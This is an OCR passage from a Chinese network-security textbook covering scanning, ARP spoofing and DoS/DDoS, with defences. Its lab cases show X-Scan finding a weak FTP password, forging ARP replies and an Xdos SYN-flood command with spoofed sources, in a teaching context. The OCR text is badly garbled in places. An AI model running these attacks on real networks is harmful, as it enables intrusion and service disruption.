无 法 接收 有 用 信息 。 另 外 ,邮件 炸弹 也 可 以 导致 邮件 服务 器 的 拒绝 服务 。 


6.2.4 防范 黑客 的 原则 


随 着 互联 网 的 日 益 普及 ,网 上 的 一 些 站 点 公然 讲解 一 些 黑客 课程 ,开辟 黑客 讨论 区 ， 
发 布 黑客 攻击 经 验 ,使 得 黑客 攻击 技术 日 益 公开 化 ,攻击 站 点 变 得 越 来 越 容易 。 加 之 有 些 
管理 员 认 为 可 以 借助 各 种 技术 措施 ,如 计算 机 反 病 毒 程序 和 网 络 防 御 系 统 软件 ,阻止 黑客 
的 非法 进攻 ,保证 计算 机 信息 安全 。 但 是 构筑 信息 安全 的 防洪 堤坝 依然 不 能 放松 ,不 能 对 
破坏 计算 机 信息 安全 的 事例 熟视无睹 ,应 结合 各 种 安全 管理 的 手段 和 制度 扼 制 黑客 的 攻 
击 , 防 患 于 未 然 。 

CD 加 强 监控 能 力 。 系 统管 理 员 要 加 强 对 系统 的 安全 检测 和 控制 能 力 , 检 测 安全 漏 
洞 及 配置 错误 ,对 已 发 现 的 系统 漏洞 ,要 立即 采取 措施 进行 升级 改造 ,做 到 防微杜渐 。 

(2) 加 强 安全 管理 。 在 确保 合法 用 户 的 合法 存 取 前 提 下 ,本 着 最 小 授权 原则 给 用 户 
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设置 属性 和 权限 ,加 强 网 络 访问 控制 ,做 好 用 户 上 网 访问 的 身份 认证 工作 ,对 非法 入 侵 者 
以 物理 隔离 方式 ,可 阻挡 绝 大 部 分 黑客 非法 进入 网 络 。 

(3) 集中 控制 。 对 网 络 实行 集中 统一 管理 和 集中 监控 机 制 , 建 立 和 完善 口令 ,使 用 和 
分 级 管理 制度 ,重要 口令 由 专人 负责 ,从 而 防止 内 部 人 员 越 级 访问 或 越权 采集 数据 。 

(4) 多 层次 防御 和 部 门 间 的 物理 隔离 。 可 以 在 防火 墙 的 基础 上 实施 对 不 同 部 门 之 间 
的 由 多 级 网 络 设置 隔离 的 小 网 络 ,根据 信息 源 的 性 质 ,尽量 对 公众 信息 和 保密 信息 实施 不 
同 的 安全 策略 和 多 级 别 保护 模式 。 

(5) 要 随时 跟踪 最 新 网 络 安全 技术 ,采用 国内 外 先进 的 网 络 安全 技术 .工具 .手段 和 
产品 。 同 时 ,一旦 防护 手段 失效 时 ,要 有 先进 的 系统 恢复 和 备份 技术 。 总 之 ,只 要 把 安全 
管理 制度 与 安全 管理 技术 手段 结合 起 来 ,整个 网 络 系统 的 安全 性 才 有 保证 ,网 络 破坏 活动 
才能 够 被 阻挡 于 门户 之 外 。 


6.3 端口 与 漏洞 扫描 


6.3.1 漏洞 扫描 简介 


1. 漏洞 扫描 的 概念 

漏洞 是 在 硬件 ,软件 和 协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 漏 洞 扫描 是 对 计算 机 系统 或 其 他 网 络 设备 
进行 与 安全 相关 的 检测 , 找 出 安全 隐患 和 可 被 黑客 利用 的 漏洞 。 系 统管 理 员 利用 漏洞 扫 
描 软 件 检测 出 系统 漏洞 以 便 有 效 地 防范 黑客 入侵 ,然而 黑客 可 以 利用 漏洞 扫描 软件 检测 
系统 漏洞 以 便于 入 侵 系 统 。 

2. 漏洞 扫描 基本 原理 

漏洞 扫描 主要 通过 以 下 两 种 方法 来 检查 目标 主机 是 否 存在 漏洞 : 在 端口 扫描 后 得 知 
目标 主机 开启 的 端口 以 及 端口 上 的 网 络 服务 ,将 这 些 相关 信息 与 网 络 漏洞 扫描 系统 提供 
的 漏洞 数据 库 进 行 匹配 ,察看 是 否 有 满足 匹配 条 件 的 漏洞 存在 :通过 模拟 黑客 的 攻击 手 
法 ,对 目标 主机 系统 进行 攻击 性 的 安全 漏洞 扫描 ,如 测试 弱 口 令 等 , 若 模 拟 攻击 成 功 , 则 表 
明 目 标 主机 系统 存在 安全 漏洞 。 

网 络 漏洞 扫描 主要 包括 三 个 步骤 : 端口 扫描 、 操 作 系统 检测 和 系统 漏洞 扫描 。 端 口 
扫描 和 操作 系统 检测 是 为 系统 漏洞 提供 必要 的 信息 ,系统 漏洞 扫描 完成 后 ,返回 系统 的 脆 
弱 性 报告 。 系 统 漏洞 检测 采用 基于 规则 的 匹配 技术 ,如 果 检 测 结果 与 漏洞 库 的 一 条 记录 
相 匹 配 , 则 认为 系统 存在 这 个 漏洞 。 


6.3.2 端口 简介 


1. 端口 的 概念 
在 网 络 技术 中 端口 (Port) 大 致 有 两 种 含义 。 一 种 是 物理 意义 上 的 端口 , 指 的 是 集 线 
器 交换 机 和 路 由 器 等 用 于 连接 其 他 网 络 设备 的 接口 ,如 RJ-45 端口 和 SC 端口 等 。 另 一 
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种 指 的 端口 不 是 物理 意义 上 的 端口 ,而 是 特 指 TCP/IP 协议 中 的 端口 ,是 迎 辑 意义 上 的 端 
口 。 在 这 里 我 们 主要 说 的 是 逻辑 意义 上 的 端口 。 

端口 是 为 运行 在 计算 机 上 的 各 种 服务 提供 的 服务 端口 ,计算 机 通过 端口 进行 通信 和 
提供 服务 。 如 果 把 IP 地 址 比 作 一 间 房 子 , 端 口 就 是 出 人 这 间 房 子 的 门 。 端 口 是 统 管 端口 
号 来 标记 的 ,端口 号 只 有 整数 ,范围 为 0 一 65535。 在 计算 机 网 络 中 ,每 个 特定 的 服务 都 在 
特定 端口 侦 听 , 当 用 户 有 数据 到 达 时 ,计算 机 检查 数据 包 中 的 端口 号 ,再 根据 端口 号 将 它 
们 发 向 特定 的 端口 。 

一 台 拥有 TP 地 址 的 主机 可 以 提供 许多 服务 ,如 WWW 服务 .FTP 服务 和 SMTP 服 
务 等 。 这 些 服 务 完全 可 以 通过 一 个 IP 地 址 来 实现 。 那 么 ,主机 怎样 区 分 不 同 的 网 络 服 务 
呢 ? 显然 不 能 只 靠 IP 地 址 ,因为 IP 地 址 与 网 络 服务 的 关系 是 一 对 多 的 关系 。 实 际 上 是 
通过 *IP 地 址 十 端口 号 ”来 区 分 不 同 服务 的 , 即 套 接 字 , 它 代表 TCP 连接 的 一 个 连接 端 ， 
一 般 称 为 Socket。 具 体 来 说 ,就 是 用 [IP: 端 口 ] 来 定位 一 台 主 机 中 的 某 个 进程 ,目的 是 为 
了 让 两 台 计算 机 能 够 找到 对 方 的 进程 。 

2. 端口 的 分 类 

按 分 配方 式 分 ,端口 分 为 公认 端口 .注册 端口 和 动态 (私有 ) 端 口 。 与 IP 地 址 一 样 , 端 
口号 也 不 是 随意 使 用 的 ,而 是 按照 一 定 的 规定 进行 分 配 。 

1) 公认 端口 

端口 号 为 0 一 1023 ,由 ICANN( 互 联网 指派 名 字 和 号 码 公 司 ) 负 责 分 配给 一 些 常用 的 
应 用 层 服 务 程 序 固 定 使 用 的 端口 。 例 如 80 端口 分 配给 WWW 服务 ,25 端口 分 配给 
SMTP 服务 等 。 

2) 注册 端口 

端口 号 为 1024 一 49151, 这 些 端口 松散 地 绑 定 于 一 些 服 务 ,也 就 是 说 ,有 许多 服务 绑 
定 于 这 些 端 口 , 这 些 端口 也 同样 可 以 用 于 许多 其 他 目的 。 例 如 许多 系统 处 理 动态 端口 从 
1024 左右 开始 。 

3) 动态 端口 

动态 端口 又 称 私有 端口 ,端口 号 为 49152 一 65535。 之 所 以 称 为 动态 端口 ,是 因为 它 
一 般 不 固定 分 配 某 种 服务 ,而 是 动态 分 配 。 动 态 分 配 是 指 当 一 个 系统 进程 或 应 用 程序 需 
要 网 络 通信 时 , 它 向 主机 申请 一 个 端口 ,主机 从 可 用 的 端口 号 中 分 配 一 个 供 它 使 用 。 当 这 
个 进程 关闭 时 ,同时 也 就 释放 了 所 占用 的 端口 号 。 

3. 端口 扫描 

端口 扫描 是 指 对 目标 计算 机 的 所 有 或 者 需要 扫描 的 端口 发 送 特定 的 数据 包 , 然 后 根 
据 返 回 的 信息 来 分 析 目 标 计算 机 的 端口 是 否 打开 、 是 否 可 用 。 

端口 扫描 行为 的 一 个 重要 特征 是 : 在 短 时 期 内 有 很 多 来 自 相同 的 信 源 TP 地 址 的 数 
据 包 发 往 同 一 TP 地 址 的 不 同 端口 或 不 同 IP 地 址 的 不 同 端口 。 

进行 扫描 的 方法 很 多 ,可 以 手工 进行 扫描 ,如 系统 内 置 的 命令 netstat, 也 可 以 用 端口 
扫描 软件 进行 ,如 X-scan。 
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6.3.3 ”实践 案例 6-1: 端口 与 漏洞 扫描 


本 实验 环境 如 图 6. 2 所 示 。 
192.168.1.2 192.168.1.3 


E. 


Windows 7 Windows Server 


入 侵 者 用 X-Scan 扫 描 设 有 FTP 弱 口令 
6.2 端口 与 漏洞 扫描 的 实验 环境 


1. 被 入 侵 者 设置 FTP 弱 口 令 
如 图 6.3 所 示 ,在 服务 器 中 进行 FTP 服务 器 配置 ,并 设置 为 不 允许 匿名 连接 。 


图 6.3 建立 FTP 站 点 


添加 用 户 ,设置 弱 口 令 。 如 图 6.4 Bros ,用户 名 : test。 密 码 : 123456 。 

2. 入 侵 者 启动 X-Scan ,设置 参数 。 

如 图 6.5 所 示 , 单 击 工具 栏 左边 第 一 个 按钮 ,进入 参数 设置 界面 ,设置 扫描 参数 ,如 
6. 6 所 示 。 输 入 目标 机 的 IP 地 址 。 

扫描 模块 : 主要 包含 一 些 服务 和 协议 弱 口 令 等 信息 的 扫描 ,根据 字典 探测 主机 各 种 
服务 的 开启 情况 及 相应 的 弱 口令 ,对 应 到 每 一 项 都 有 相应 的 说 明 。 

3. 入 侵 者 进行 扫描 

设置 完成 后 , 单 击 图 6. 6 中 工具 栏 左边 第 二 个 按钮 .进行 探测 扫描 ,此 扫描 的 速度 与 
网 络 环境 情况 和 本 机 配置 等 有 关 . 不 尽 相 同 ,如 图 6.7 所 示 。 


计算 机 管理 EH) 
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图 6.4 设置 弱 口令 


图 6.5 Xcan 工作 界面 


网 络 安全 技术 
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6.7 fi 


报告 生成 : 扫描 完成 后 会 根据 报告 设置 中 自动 生成 报告 项 生成 报告 ,如 图 6. 8 所 示 。 
根据 探测 扫描 报告 取得 的 信息 进行 漏洞 测试 : 检测 到 FTP 弱 口 令 漏洞 。 


EXC] 
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4. 进行 漏洞 攻击 测试 
入 侵 者 根据 获得 的 弱 口 令 登 录 服务 器 的 FTP 站 点 ,如 图 6.9 所 示 。 


图 6.9 FTP 登录 界面 


6.4 ARP 欺骗 


在 局 域 网 中 ,通信 前 必须 通过 ARP 协议 来 完成 IP 地 址 转换 为 第 二 层 物理 地 址 ( 即 
MAC 地 址 )。ARP 协议 对 网 络 安全 具有 重要 的 意义 。 


6.4.1 ARP 欺骗 的 原理 


以 太 网 设备 (例如 网 卡 ) 都 有 自己 全 球 唯 一 的 MAC 地 址 ,它们 是 以 MAC 地 址 来 传 
输 以 太 网 数据 包 的 ,但 是 以 太 网 设备 却 识别 不 了 IP 数据 包 中 的 TP 地 址 ,所 以 要 在 以 太 网 
中 进行 IP 通信 ,就 需要 一 个 协议 来 建立 IP 地 址 与 MAC 地 址 的 对 应 关系 ,使 IP 数据 包 
能 够 发 送 到 一 个 确定 的 主机 上 。 这 种 功能 是 由 ARP(Address Resolution Protocol) 来 完 
成 的 。 

ARP 被 设计 成 用 来 实现 IP 地 址 到 MAC 地 址 的 映射 。ARP 使 用 一 个 被 称 为 ARP 
高 速 缓存 的 表 来 存储 这 种 映射 关系 ,ARP 高 速 缓存 用 来 存储 临时 数据 (IP 地 址 与 MAC 
地 址 的 映射 关系 ) ,存储 在 ARP 高 速 缓存 中 的 数据 在 几 分钟 内 没 被 使 用 ,会 被 自动 删除 。 

ARP 协议 不 管 是 否 发 送 ARP 请 求 ,都 会 根据 收 到 的 任何 ARP 应 答 数据 包 对 本 地 的 
ARP 高 速 缓存 进行 更 新 ,将 应 答 数 据 包 中 的 TP 地 址 和 MAC 地 址 存储 在 ARP 高 速 缓存 
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中 。 这 正 是 实现 ARP 欺骗 的 关键 。 

ARP 欺骗 是 黑客 常用 的 攻击 手段 之 一 ,ARP 欺骗 分 为 两 种 : 一 种 是 对 路 由 器 ARP 
表 的 欺骗 ; 另 一 种 是 对 内 网 PC 的 网 关 欺 骗 。 第 一 种 ARP 欺骗 的 原理 是 截获 网 关 数 据 。 
它 通知 路 由 器 一 系列 错误 的 内 网 MAC 地 址 ,并 按照 一 定 的 频率 不 断 进行 ,使 真实 的 地 址 
信息 无 法 通过 更 新 保存 在 路 由 器 中 ,结果 路 由 器 的 所 有 数据 只 能 发 送 给 错误 的 MAC 地 
址 ,造成 正常 PC 无 法 收 到 信息 。 第 二 种 ARP 欺骗 的 原理 是 伪造 网 关 。 它 的 原理 是 建立 
假 网 关 , 让 被 它 欺骗 的 PC 向 假 网 关 发 数据 ,而 不 是 通过 正常 的 路 由 器 途径 上 网 。 在 PC 
看 来 ,就 是 上 不 了 网 “网 络 掉 线 了 ”。 


6.4.2 实践 案例 6-2: ARP 欺骗 


需要 使 用 协议 编辑 软件 进行 数据 包 编 辑 并 发 送 。IP 地 址 分 配 参考 如 表 6. 1 所 示 , 此 
实验 环境 需要 根据 自己 的 真实 环境 来 配置 。 


表 6.1 IP 地 址 和 MAC 地 址 对 应 表 


设 备 IP 地 址 MAC 地 址 

GW 192. 168. 1. 1 00-0C-29-0D-02-E4 
HostA 192.168.1.2 00-0C-29-2E-6D-98 
HostB 192.168. 1.3 00-0C-29-A4-CE-7B 


设备 连接 如 图 6. 10 所 示 。 


GW: 192.168.1.1 
00-0C-29-0D-02-E4 


HostA: 192.168.1.2 HostB: 192.168.1.3 
00-0C-29-2E-6D-98 00-0C-29-A4-CE-7B 


图 6.10 实验 环境 图 


1. 设 定 环境 

根据 环境 拓扑 图 设 定 网 络 环 境 , 并 测试 连通 性 。 

2. 主机 欺骗 

(D 在 HostB 的 主机 上 使 用 ARP -a 命令 查看 网 关 的 ARP 列表 ,如 图 6. 11 所 示 。 

通过 上 面 命 令 可 以 看 到 真实 网 关 的 MAC 地 址 为 00-0C-29-0D-02-E4, 可 以 通过 发 送 
ARP 数据 包 改 变 客户 机 的 ARP 列表 ,将 网 关 的 MAC 地 址 改变 00-0C-29-2E-6D-98。 

(2) 从 工具 箱 中 下 载 工 具 , 编 辑 ARP 数据 包 , 模 拟 网 关 路 由 器 发 送 ARP. 更 新 信息 。 
首先 打开 协议 编辑 软件 , 单 击 菜单 栏 中 的 “添加 ”按钮 ,如 图 6. 12 所 示 。 添 加 一 个 ARP 协 
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议 模 板 , 单 击 确认 添加 。 


图 6.11 ARP 缓存 表 
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图 6.12 网 络 协议 编辑 界面 


(3) 修改 协议 模板 的 每 个 值 ,如 图 6. 13 所 示 。 注 意 : 图 6. 13 中 源 物理 地 址 和 发 送 物 
理 地 址 应 该 是 HostA 的 地 址 ,发 送 IP 地 址 应 该 是 网 关 的 地 址 。 


—| 
In SAO DEO MED ——— 
p " 


[2 FAHHEZU 
hoocoore Fr BF FE FE FE FE 
hom cox 


bma c xz Ac ER 


图 6. 13 编辑 并 校 验 数据 包 
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(4) 编辑 并 校 验 完成 后 , 单 击 * 开 始 ? 按 钮 ,如 图 6. 14 所 示 。 
3. 测试 
在 HostB 上 使 用 命令 ARP -a 命令 来 查看 ARP 表 项 ,如 图 6. 15 所 示 。 


图 6.14 发 送 数据 包 图 6.15 ARP 缓存 表 


此 时 ,所 有 向 外 发 送 的 数据 包 ,都 会 被 转发 到 攻击 者 的 主机 上 ,从 而 获得 敏感 信息 。 
用 命令 ARP - d 命令 来 清空 IP, 以 便 后 续 实验 的 进行 。 


6.4.3 ARP 欺骗 攻击 的 防范 


CD 在 客户 端 使 用 ARP 命令 绑 定 网 关 的 IP/MAC( 例 如 ARP -s 192. 168. 1. 1 00-e0 
eb-81-81-85)。 

(2) 在 交换 机 上 做 端口 与 MAC 地 址 的 静态 绑 定 

(3) 在 路 由 器 上 做 IP/MAC 地 址 的 静态 绑 定 。 

(4) 使 用 ARP 服务 器 定时 广播 网 段 内 所 有 主机 的 正确 IP/MAC 映射 表 。 

(5) 及 时 升级 客户 端的 操作 系统 和 应 用 程序 补丁 。 

(6) 升级 杀毒 软件 及 其 病毒 库 。 


6.5 DoS 5 DDoS 攻击 检测 与 防 和 法 


自 2000 年 以 来 ,国内 外 的 一 些 大 型 网 站 屡次 遭 到 攻击 ,服务 器 连续 几 十 小 时 无 法 正 
常 工作 ,造成 巨大 的 经 济 损失 。 这 几 次 黑客 利用 的 攻击 方法 都 是 拒绝 服务 攻击 中 的 一 种 。 
拒绝 服务 攻击 现在 已 是 一 种 遍布 全 球 的 系统 漏洞 攻击 方法 ,无 数 的 网 络 用 户 已 成 为 这 种 
攻击 的 受害 者 。 


6.5.1 DoS 与 DDoS 攻击 简介 


1. DoS 攻击 

DoS( Denial of Service, 拒 绝 服务 ) 攻 击 是 通过 对 主机 特定 漏洞 的 利用 进行 攻击 导致 
网 络 栈 失 效 、 系 统 崩 溃 主机 死机 而 无 法 提供 正常 的 网 络 服务 功能 ,从 而 造成 拒绝 服务 ,或 
者 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 器 资源 (包括 网 络 带宽 文件 系统 空间 容量 或 者 
网 络 连接 等 ) ,致使 服务 器 超载 ,最 终 无 法 响应 其 他 用 户 正 常 的 服务 请 求 。 
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Dos 攻击 一 般 采 用 一 对 一 的 方式 。 

常见 的 DoS 攻击 方式 有 : 死亡 之 ping (ping of death), TCP 全 连接 攻击 、SYN 
Flood, SYN/ACK Flood, TearDrop, Land, Smurf, Will Script 脚本 攻击 和 UDP 攻击 等 。 

2. DDoS 攻击 


DDoS(Distributed Denial of Service. 分 布 式 拒 绝 服务 ) 攻 击 , 又 被 称 为 “洪水 式 攻 
击 ”, 是 在 DoS 攻击 的 基础 上 产生 的 一 种 分 布 式 、 协 作 式 的 大 规模 拒绝 服务 攻击 方式 ,其 
攻击 策略 侧重 于 通过 很 多 “僵尸 主机 ”( 被 攻击 者 入 侵 过 或 可 间接 利用 的 主机 ) 向 受害 主机 
发 送 大 量 看 似 合法 的 网 络 数 据 包 ,从 而 造成 网 络 阻塞 或 服务 器 资源 耗 尽 而 导致 拒绝 服务 ， 
分 布 式 拒绝 服务 攻击 一 旦 被 实施 ,攻击 网 络 数据 包 就 会 如 洪水 般 涌 向 受害 主机 ,从 而 把 合 
法 用 户 的 网 络 数据 包 渡 没 ,导致 合法 用 户 无 法 正常 访问 服务 器 的 网 络 资源 。 DDoS 攻击 
是 目前 难以 防范 的 攻击 手段 ,这 种 攻击 主要 针对 大 的 站 点 。 由 于 攻守 双方 系统 资源 的 差 
VW EK , DDoS 攻击 具有 更 大 的 破坏 性 。 

DDoS 的 攻击 形式 主要 有 : 流量 攻击 和 资源 耗 尽 攻击 。 

CD 流量 攻击 : 主要 是 针对 网 络 带 宽 的 攻击 , 即 大 量 攻击 包 导 致 网 络 带 宽 被 阻塞 , 合 
法 网 络 包 被 虚假 的 攻击 包 瀑 没 而 无 法 到 达 主 机 。 

(2) 资源 耗 尽 攻击 : 主要 是 针对 服务 器 主机 的 攻击 , 即 通过 大 量 攻击 包 导致 主机 的 
内 存 被 耗 尽 或 CPU 被 占 完 而 导致 无 法 提供 正常 网 络 服务 。 

DDoS 攻击 采用 多 对 一 的 方式 。 

DDos 攻击 主要 由 以 下 五 部 分 组 成 。 

(1) 客户 端 : 用 户 通 过 发 动 攻击 的 应 用 程序 ,攻击 者 通过 它 来 发 送 各 种 命令 。 

(2) 主 控 端 : 运行 客户 端 程序 的 主机 。 

(3) 代理 端 : 运行 守护 程序 的 主机 。 

(4) 守护 程序 : 在 代理 端 主机 运行 的 进程 ,接收 和 发 送 来 自 客户 端的 命令 。 

(5) 目标 主机 : DDos 攻击 的 主机 或 网 络 。 

分 布 式 拒绝 服务 攻击 的 基本 思路 是 : 攻击 者 首先 控制 主 控 端 ( 主 控 端 是 一 台 已 经 被 
攻击 者 入 侵 并 完全 控制 的 运行 特定 攻击 程序 的 系统 主机 ) ,然后 再 由 主 控 端 去 控制 多 台 代 
理 端 ,每 个 代理 端 也 是 一 台 被 人 侵 并 运行 特定 程序 的 系统 主机 。 当 攻击 者 向 主 控 端 发 送 
攻击 命令 后 , 主 控 端 再 向 每 个 代理 端 发 送 , 这 样 每 个 代理 端 就 会 向 目标 主机 发 送 大 量 的 拒 
绝 服务 攻击 数据 包 来 实现 分 布 式 拒绝 服务 攻击 。 这 个 过 程 是 自动 完成 的 ,主要 分 为 以 下 
五 个 步骤 。 

CD 探测 扫描 大 量 主机 ,以 寻找 可 以 入 侵 的 主机 。 

(2) 入 侵 有 安全 漏洞 的 主机 并 获得 控制 权 。 

(3) 在 每 台 入 侵 主机 中 安装 攻击 程序 。 

(4) 利用 已 有 入 侵 主 机 继续 进行 扫描 和 入 侵 。 

(5) 利用 这 些 入 侵 主 机 向 目标 主机 发 动 DDos 攻击 。 

分 布 式 拒 绝 服务 攻击 的 结构 图 如 图 6. 16 所 示 。 

常见 的 DDoS 攻击 方式 有 SYN Flood, ACK Flood, UDP Flood, ICMP Flood, TCP 
Flood, Connections Flood, Script Flood 和 Proxy Flood 等 。 
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图 6.16 分 布 式 拒绝 服务 攻击 结构 图 


6.5.2 DoS 与 DDoS 攻击 检测 与 防范 


1. 拒绝 服务 攻击 的 检测 

常用 的 检测 方法 有 : 使 用 ping 命令 检测 和 使 用 netstat 命令 检测 。 

(1) 使 用 ping 命令 检测 。 使 用 ping 命令 检测 时 如 果 出 现 超时 或 者 严重 丢 包 的 现象 ， 
则 有 可 能 是 受到 流量 攻击 。 如 果 使 用 ping 命令 测试 某 服务 器 时 基本 正常 ,但 无 法 访问 服 
务 ( 比 如 无 法 打开 网 页 等 ) ,而 ping 同一 交换 机 上 的 其 他 主机 正常 , 则 有 可 能 是 受到 资源 
耗 尽 攻击 。 

(2) 使 用 netstat 命令 检测 。 在 服务 器 上 执行 netstat-an 命令 ,如 果 显 示 大 量 的 SYN 
.RECEIVED, TIME WAIT,FIN WAIT 1 等 状态 ,而 ESTABLISHED 状态 很 少 , 则 可 
以 判定 是 受到 资源 耗 尽 攻击 。 

2. 拒绝 服务 攻击 的 防范 

防范 DDoS 是 一 个 系统 工程 , 若 想 仅 仅 依靠 某 种 系统 或 产品 防范 DDoS 是 不 现实 的 ， 
目前 ,完全 杜绝 DDoS 也 是 不 可 能 的 ,但 是 ,通过 适当 的 措施 还 是 可 以 防范 大 多 数 一 般 性 
的 DDoS 攻击 。 

CD 采用 高 性 能 的 网 络 设备 。 最 好 采用 高 性 能 的 网 络 设备 ,并 且 及 时 升级 主机 服务 
器 的 硬件 配置 ,尤其 是 主机 和 内 存 , 以 提高 抗拒 绝 服务 攻击 的 能 力 。 

(2) 避免 NAT 的 使 用 。 无 论 是 路 由 器 还 是 防火 墙 都 要 避免 使 用 NAT( 网 络 地 址 
转换 ) 。 

(3) 充足 的 网 络 带宽 。 网 络 带 宽 直 接 决 定 网 络 能 够 承受 拒绝 服务 攻击 的 能 力 。 

(4) 把 网 站 做 成 静态 页 面 。 把 网 站 尽 可 能 做 成 静态 页 面 ,不 仅 可 以 提高 抗 攻击 能 力 ， 
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还 能 够 增加 黑客 人 侵 的 难度 ,比如 搜狐 .新 浪 等 大 型 门户 网 站 主要 采用 静态 页 面 。 

(5) 增强 操作 系统 的 TCP/IP 栈 。 

(6) 安装 专业 抗 DDoS 防火 墙 。 

(7) 采用 负载 均衡 技术 。 将 网 站 分 布 在 多 个 主机 上 ,每 个 主机 只 提供 网 站 的 一 部 分 
服务 ,以 避免 受 攻击 时 全 部 瘫痪 。 


6.5.3 ”实践 案例 6-3: SYN 攻击 


SYN Flood 是 目前 最 流行 的 DDoS 攻击 手段 ,DDoS 只 是 洪水 攻击 的 一 个 种 类 。 其 
实 还 有 其 他 种 类 的 洪水 攻击 。 

Syn Flood 利用 了 TCP/IP 协议 的 固有 漏洞 。 面 向 连接 的 TCP 三 次 握手 是 Syn 
Flood 存在 的 基础 。 假 设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 突然 死机 或 掉 线 ,那么 服 
务 器 在 发 出 SYN 十 ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 文 的 (第 三 次 握手 无 法 
完成 ) ,这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN 十 ACK 给 客户 端 ) 并 等 待 一 段 时 
间 后 丢弃 这 个 未 完成 的 连接 ,这 段 时 间 的 长 度 我 们 称 为 SYN Timeout ,一 般 来 说 这 个 时 
间 是 分 钟 的 数量 级 (大 约 为 30 秒 一 2 分 钟 )。 一 个 用 户 出 现 异 常 导 致 服务 器 的 一 个 线程 
等 待 1 分 钟 并 不 是 很 严重 的 问题 ,但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ,服务 器 
端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 ,即使 是 简单 的 保存 并 遍历 
也 会 消耗 非常 多 的 CPU 时 间 和 内 存 , 何 况 还 要 不 断 对 这 个 列表 中 的 IP 进行 SYN 十 ACK 
的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ,最 后 的 结果 往往 是 堆栈 溢出 崩 
溃 一 一 即使 服务 器 端的 系统 足够 强大 ,服务 器 端 也 将 忙于 处 理 攻 击 者 伪造 的 TCP 连接 请 
求 而 无 暇 理 皮 客 户 的 正常 请 求 ( 毕 竟 客 户 端的 正常 请 求 比率 非常 小 ) ,此 时 从 正常 客户 的 
角度 看 来 ,服务 器 失去 响应 ,这 种 情况 称 作 : 服务 器 端 受到 SYN Flood 攻击 (SYN 洪水 攻 
i. 

从 防御 角度 来 说 ,有 几 种 简单 的 解决 方法 。 

第 一 种 是 缩短 SYN Timeout 时 间 , 由 于 SYN Flood 攻击 的 效果 取决 于 服务 器 上 保 
持 的 SYN 半 连 接 数 ,这 个 值 等 于 SYN 攻击 的 频 度 。 

SYN Timeout ,可 以 通过 缩短 从 接收 到 SYN 报 文 到 确定 这 个 报 文 无 效 并 丢弃 该 连 
接 的 时 间 ,例如 设置 为 20 秒 以 下 (过 低 的 SYN Timeout 设置 可 能 会 影响 客户 的 正常 访 
To] ) ,可 以 成 倍 地 降低 服务 器 的 负荷 。 

第 二 种 方法 是 设置 SYN Cookie, 就 是 给 每 一 个 请 求 连接 的 IP 地 址 分 配 一 个 Cookie, 
如 果 短 时 间 内 连续 受到 某 个 IP 的 重复 SYN 报 文 ,就 认定 是 受到 了 攻击 ,以 后 来 自 这 个 
IP 地 址 的 包 会 被 丢弃 。 

1. 实验 环境 

实验 环境 如 图 6. 17 所 示 。 

2. 实验 内 容 

COD 运行 SYN 攻击 程序 ,以 本 地 主机 为 目标 主机 对 其 发 送 SYN 数据 包 。 

(2) 查看 目标 主机 状态 。 
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192.168.1.2 192.168.1.3 
Ei L ELS 
本 地 主机 Windows Server 


Windows 7 
图 6.17 实验 环境 


3. 实验 步骤 
(D 在 Windows Server 的 cmd F3& Xdos 攻击 工具 ,Xdos 运行 界面 如 图 6. 18 所 示 。 


ES C: VIMOYS\systen32\en' 


图 6.18 Xdos 运行 界面 
(2) Xdos 命令 举例 演示 如 下 : xdos 192. 168. 1. 2 139 -t 3 -s 55. 55. 55. 55,192. 168. 
1. 2 为 被 攻击 主机 的 IP 地 址 ,139 为 连接 端口 ,-t 3 表示 开启 的 进程 ,-s 后 跟 的 IP 地 址 为 
SYN 数据 包 伪 装 的 源 地 址 的 起 始 地 址 ,运行 显示 如 图 6. 19 所 示 


C: \FINDOTS\systea32\cmd. exe ~ xdos. exe 192.168.1.2 139 下 


图 6.19 运行 SYN 攻击 
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在 目标 主机 使 用 wireshark 抓 包 .如 图 6. 20 所 示 , 可 以 看 到 大 量 的 SYN 向 192. 168. 
1.2 主机 发 送 ,并 且 将 源 地址 改 为 55. 55. 55. 55 后 面 的 IP 地 址 。 查 看 抓 包 状态 ,syn_ 
received 状态 的 连接 ,表示 192. 168. 1. 43 主机 接收 到 SYN 数据 包 , 但 并 未 收 到 ACK 确 
认 数 据 包 , 即 TCP 三 次 握手 的 第 三 个 数据 包 。 


TA (ati thea) - Firesberk s ox 
Ele Edi View Go Capture Anayee Statstics Help 


B & & e a|leux-e6a28l8e*ecz8z!| 


Eiter [ * Expression.. Clear Appy 


H 7775 room 


x 
[s Frame 9926 (58 bytes on wire, 58 bytes captured) 
Sii —— 


000 10 47 80 ld Se 44 00 Oc 29 2e 6d z 
O 00 2c e4 eb 00 00 RO O6 21 d$ có a8 Ol 0? P 
3b 2a 00 8b 26 dd af 4a 62 1e 00 00 f3 la 60 12 

40 00 f8 1e 00 00 02 04 05 b4 


File: "EIDOCUNE-TIADNINI-TILOCALS -TiTemplefieno00 300588" 3294 ~ |P: 44551 D: 44551 M: 0 Drops: 561168 


图 6.20 wireshark Jf & 


6.6 防火 墙 简介 


近年 来 , 随 着 普通 计算 机 用 户 群 的 日 益 增长 ,防火 墙 一 词 已 经 不 再 是 服务 器 领域 的 专 
属 ,大 部 分 家 庭 用 户 都 知道 为 自己 爱 机 安装 各 种 防火 墙 软件 了 。 但 是 ,并 不 是 所 有 用 户 都 
对 防火 墙 有 所 了 解 ,一 部 分 用 户 甚至 认为 ,防火 墙 是 一 种 软件 的 名 称 。 

到 底 什 么 才 是 防火 墙 ? 它 工作 在 什么 位 置 ? 起 着 什么 作用 ? 查阅 历史 书籍 可 知 , 古 
代 构 筑 和 使 用 木质 结构 房屋 的 时 候 为 防止 火灾 的 发 生 和 蔓延 ,人 们 将 坚固 的 石 块 堆砌 在 
房屋 周围 作为 屏障 ,这 种 防护 构筑 物 就 被 称 为 防火 墙 CFire Wall) 。 时 光 如 梭 , 随 着 计算 
